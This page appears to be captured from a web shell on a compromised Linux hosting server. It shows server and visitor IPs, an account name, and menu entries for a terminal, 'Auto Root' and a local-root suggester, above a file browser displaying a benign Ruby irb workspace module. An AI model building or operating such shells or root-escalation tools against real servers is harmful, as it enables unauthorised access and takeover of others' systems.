Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
irb /
ext /
Delete
Unzip
Name
Size
Permission
Date
Action
change-ws.rb
939
B
-rw-r--r--
2026-04-07 16:51
eval_history.rb
3.63
KB
-rw-r--r--
2026-04-07 16:51
loader.rb
3.23
KB
-rw-r--r--
2026-04-07 16:51
multi-irb.rb
6.37
KB
-rw-r--r--
2026-04-07 16:51
tracer.rb
1.17
KB
-rw-r--r--
2026-04-07 16:51
use-loader.rb
1.82
KB
-rw-r--r--
2026-04-07 16:51
workspaces.rb
1.08
KB
-rw-r--r--
2026-04-07 16:51
Save
Rename
# frozen_string_literal: true # # irb/ext/cb.rb - # by Keiju ISHITSUKA(keiju@ruby-lang.org) # module IRB # :nodoc: class Context # Inherited from +TOPLEVEL_BINDING+. def home_workspace if defined? @home_workspace @home_workspace else @home_workspace = workspace end end # Changes the current workspace to given object or binding. # # If the optional argument is omitted, the workspace will be # #home_workspace which is inherited from +TOPLEVEL_BINDING+ or the main # object, <code>IRB.conf[:MAIN_CONTEXT]</code> when irb was initialized. # # See IRB::WorkSpace.new for more information. def change_workspace(*_main) if _main.empty? replace_workspace(home_workspace) return main end workspace = WorkSpace.new(_main[0]) replace_workspace(workspace) workspace.load_helper_methods_to_main end end end